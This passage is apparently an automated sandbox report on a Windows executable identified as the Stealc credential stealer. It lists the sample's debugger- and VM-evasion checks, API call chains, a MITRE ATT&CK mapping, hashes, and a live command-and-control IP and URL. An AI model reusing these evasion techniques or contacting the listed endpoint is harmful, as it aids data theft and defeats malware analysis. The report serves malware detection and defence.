                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB83 second address: 10EBB91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F8Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBE78 second address: 10EBE82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF020 second address: 10EF029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF2D2 second address: 10EF2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F84086DC786h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EF2E4 second address: 10EF31A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8408CC9F91h 0x0000000b popad 0x0000000c nop 0x0000000d mov dx, ax 0x00000010 push dword ptr [ebp+122D1A7Bh] 0x00000016 mov edx, dword ptr [ebp+1246EBBFh] 0x0000001c push 7FF79F89h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007F8408CC9F86h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F20C4 second address: 10F20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3BC6 second address: 10F3BCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F3BCC second address: 10F3BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jnp 00007F84086DC786h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007F84086DC78Eh 0x0000001a jmp 00007F84086DC78Eh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573025F second address: 5730263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730263 second address: 5730269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730269 second address: 5730282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730282 second address: 5730288 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5730288 second address: 573029F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8408CC9F92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573033F second address: 573035B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC798h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 573035B second address: 57303CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8408CC9F91h 0x00000009 sub ecx, 2F978026h 0x0000000f jmp 00007F8408CC9F91h 0x00000014 popfd 0x00000015 call 00007F8408CC9F90h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F8408CC9F91h 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F8408CC9F98h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57303CC second address: 57303D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57303D0 second address: 57303D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57303D6 second address: 57303DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100CA7A second address: 100CA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FFE71B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 101171B instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 108E4E6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00C138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00C0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00C0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C0BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C0DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C01160 GetSystemInfo,ExitProcess,0_2_00C01160
                Source: file.exe, file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1803785871.00000000017F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13533
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13554
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13536
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13547
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13587
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C045C0 VirtualProtect ?,00000004,00000100,000000000_2_00C045C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C19860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19750 mov eax, dword ptr fs:[00000030h]0_2_00C19750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C178E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C19600
                Source: file.exe, file.exe, 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: i=Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C17B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C17980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C17850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C17A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1748761507.00000000055E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5776, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php%17%VirustotalBrowse
                http://185.215.113.37/rsonation17%VirustotalBrowse
                http://185.215.113.37/k17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpi17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.1803785871.000000000177E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/rsonationfile.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.php%file.exe, 00000000.00000002.1803785871.00000000017E6000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpifile.exe, 00000000.00000002.1803785871.00000000017C3000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/kfile.exe, 00000000.00000002.1803785871.00000000017DB000.00000004.00000020.00020000.00000000.sdmptrueunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                185.215.113.37
                		unknownPortugal
                		206894WHOLESALECONNECTIONSNLtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1532547
                Start date and time:2024-10-13 16:53:05 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 12s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:1
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 80%
                • Number of executed functions: 18
                • Number of non-executed functions: 85
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated

                Warnings

                • Excluded IPs from analysis (whitelisted): 20.109.210.53, 93.184.221.240
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                185.215.113.37file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37/e2b1563c6670f193.php
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37/e2b1563c6670f193.php

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealcBrowse
                • 185.215.113.37
                file.exeGet hashmaliciousStealc, VidarBrowse
                • 185.215.113.37

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.946406803121469
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:file.exe
                File size:1'844'736 bytes
                MD5:c611a14ca47ba7634683b36724d2b4c8
                SHA1:537c413a3e9060f795510eb8d8659ad5b6de3080
                SHA256:ba6b7db3b9727fd4132bd4e2e6065f0b28c0e21e0bcac29abb2a2d9e0a81425f
                SHA512:ca18a9f6555e9004aa9c654f43a014cd9431535f9018faa573be410e7df3fcf7992c9605648bde26192b7c26ce138a3df517abd5be0db5958b5bece291c71d69
                SSDEEP:49152:T7VWtLekeScyMTzUFOebgQJNp3/eqWhg0yRKM:T0ekoz1LQJXfWhgv
                TLSH:2A8533014C62576BCCBC9AFF077A1E1F37AC1AED361A8406AB1B1F69C513DF1112A89D
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                File Icon

                Icon Hash:90cececece8e8eb0

                Static PE Info

                General

                Entrypoint:0xa9b000
                Entrypoint Section:.taggant
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:2eabe9054cad5152567f0699947a2c5b

                Entrypoint Preview

                Instruction
                jmp 00007F840855BFAAh

                Rich Headers

                Programming Language:
                • [C++] VS2010 build 30319
                • [ASM] VS2010 build 30319
                • [ C ] VS2010 build 30319
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
                • [LNK] VS2010 build 30319

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                0x10000x25b0000x2280047c1c2b8cac745fb5127ad36bc89adccunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                0x25e0000x29f0000x2004901c39baa02e9114c0c2aff1937bb20unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
